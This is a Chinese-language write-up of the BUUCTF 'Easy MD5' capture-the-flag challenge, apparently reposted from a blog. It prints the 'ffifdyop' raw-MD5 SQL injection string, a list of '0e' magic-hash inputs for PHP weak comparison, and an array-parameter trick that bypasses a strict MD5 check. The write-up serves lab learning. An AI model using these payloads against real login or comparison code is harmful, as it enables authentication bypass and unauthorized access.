其他分享
首页 > 其他分享> > BUUCTF [BJDCTF2020]Easy MD5 wp

BUUCTF [BJDCTF2020]Easy MD5 wp

作者:互联网

[BJDCTF2020]Easy MD5

image-20210919163843839

点击进行去后,看到有输入框。随便输入一串,并没有结果回显,查看数据包

image-20210919164500330

提示进行了md5加密

这里有一个神奇的字符串,

ffifdyop
由于数据库mysql会将md5加密后的hex值转换成字符串再执行,但这个字符串加密后再转字符串就是

'or'6�]��!r,��b
条件恒真

129581926211651571912466741651878684928
也有同效

登陆后,image-20210920091930843

查看源码

image-20210920093318708

这是一个弱类型的MD5碰撞,

QNKCDZO
0e830400451993494058024219903391


s878926199a
0e545993274517709034328855841020


s155964671a
0e342768416822451524974117254469


s214587387a
0e848240448830537924465865611904


s214587387a
0e848240448830537924465865611904


s878926199a
0e545993274517709034328855841020


s1091221200a
0e940624217856561557816327384675


s1885207154a
0e509367213418206700842008763514

s1502113478a
0e861580163291561247404381396064

常见的有上述这些,原理是当加密后,首字几个为0e,会被当成科学计数法,而0的几次方都是0。

image-20210920091720670

在跳转到这里,

这里则是md5的强对撞,使用数组类型可绕过

?param1[]=111&param2[]=222

标签:s214587387a,BUUCTF,加密,s878926199a,Easy,wp,字符串,md5,MD5
来源: https://www.cnblogs.com/Hankysblogs/p/15314916.html